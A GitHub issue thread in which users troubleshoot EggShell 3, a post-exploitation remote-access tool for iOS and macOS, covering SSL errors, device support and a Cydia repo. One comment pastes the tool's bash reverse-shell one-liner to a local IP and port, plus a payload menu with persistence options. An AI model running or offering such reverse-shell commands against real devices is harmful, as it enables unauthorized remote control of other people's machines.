### ISSUE TITLE
eggshell repo in cydia?

### ISSUE THREAD

**Issue by mineo210** [neoneggplant/EggShell#72]
I remember that you had your repo here for Cydia, finally got my hands on a iPhone 5 bcuz it's 32bit and have no luck of finding the repo.

**Comment by neoneggplant** [comment]
I am releasing version 3 hopefully this week, supports 64 bit as well :)

**Comment by mineo210** [comment]
@neoneggplant great! I've been trying out the latest version of version 3 and so far I've found some problems. somehow it doesn't want to work when executing the bash payload on the phone for me. 

```
----------------------------------------
bash &> /dev/tcp/192.168.1.119/4444 0>&1
----------------------------------------
EggShell> Start Server? (Y/n): y
EggShell> MultiHandler? (y/N): n
[*] Listening on port 4444...
[*] Connecting to 192.168.1.108
[*] Device unrecognized, trying python payload
[*] Sending Payload
[*] Establishing Secure Connection...
```
some other small problems that maybe are small mistakes is that persistence doesn't seem to work on macOS and the new teensy payload makes this error: 

```
Payloads:

    1): bash
    2): Teensy macOS

[*] Choose an payload> 2
[*] SET LHOST (Leave blank for 192.168.1.119)>
[*] LHOST = 192.168.1.119
[*] SET LPORT (Leave blank for 4444)>
[*] LPORT = 4444
[*] Make Persistent? (y/N): n
[Errno 2] No such file or directory: 'payloads/teensy_macos.ino'
[*] Choose an payload> 
```

**Comment by neoneggplant** [comment]
@mineo210 what ios device are you using, I may just need to add your device architecture

**Comment by neoneggplant** [comment]
@mineo210 I appreciate you finding these bugs! I just pushed a fix for teensy payload creation

**Comment by mineo210** [comment]
@neoneggplant Great and I'm running on IOS 9.1 on a iPhone 5 32bit.

**Comment by mineo210** [comment]
@neoneggplant And this is happening for me:
![screen shot 2018-01-05 at 20 20 33](https://user-images.githubusercontent.com/24258597/34624578-2083d04a-f256-11e7-8a76-ea0dcfe229fd.png)

running OS X El Capitan version 10.11.5

**Comment by neoneggplant** [comment]
hmm, I'm trying to figure out what file it cannot find

**Comment by neoneggplant** [comment]
do you have server.crt and server.key being generated in your ".keys" folder in the root directory of eggshell3?

**Comment by mineo210** [comment]
@neoneggplant Sorry for late respond.
![screen shot 2018-01-05 at 23 11 04](https://user-images.githubusercontent.com/24258597/34630760-c39cc72a-f26d-11e7-9bf2-6fbd775181fb.png)

**Comment by neoneggplant** [comment]
ok, I found it is an ssl error, what version of ssl are you using? run 'openssl version'

**Comment by mineo210** [comment]
@neoneggplant OpenSSL 1.1.1-dev and Python 2.7.14

**Comment by neoneggplant** [comment]
did the latest commit fix the iOS issue? I don't have an iPhone 5 to test on

**Comment by mineo210** [comment]
@neoneggplant same error, might be bcuz of the OpenSSL error.

**Comment by neoneggplant** [comment]
what OS are you on?

**Comment by neoneggplant** [comment]
also I have some good news! I got eggshell working on my iphone 6, repo coming soon :)
<img width="452" alt="screen shot 2018-01-08 at 1 25 12 am" src="https://user-images.githubusercontent.com/12518571/34660862-93917312-f413-11e7-843e-82dfb88b8cdf.png">
<img width="332" alt="screen shot 2018-01-08 at 1 26 39 am" src="https://user-images.githubusercontent.com/12518571/34660866-974953e4-f413-11e7-823a-a7f18ece0bd5.png">

**Comment by mineo210** [comment]
@neoneggplant great! I'm running OS X El Capitan version 10.11.5

**Comment by neoneggplant** [comment]
where did you install openssl from? the default is lower than 1.1.1, just asking so I can try to replicate the issue

**Comment by mineo210** [comment]
@neoneggplant installed it from here some days ago because I was having some problems with the other version https://github.com/openssl/openssl

**Comment by neoneggplant** [comment]
see if you can restore back to the original. Also, I just setup eggshell for iOS on a new repo: http://lucasjackson.io/repo
let me know if this works for you :)

**Comment by mineo210** [comment]
@neoneggplant awesome! managed to restore to openssl 1.0.2. took longer than expected. Used to have a 64bit phone but the 32bit one is my main one rn :(

**Comment by rt004984** [comment]
Hello, 

I'm getting an error " establishing secure connection " Please help me to solve this problem Thank you
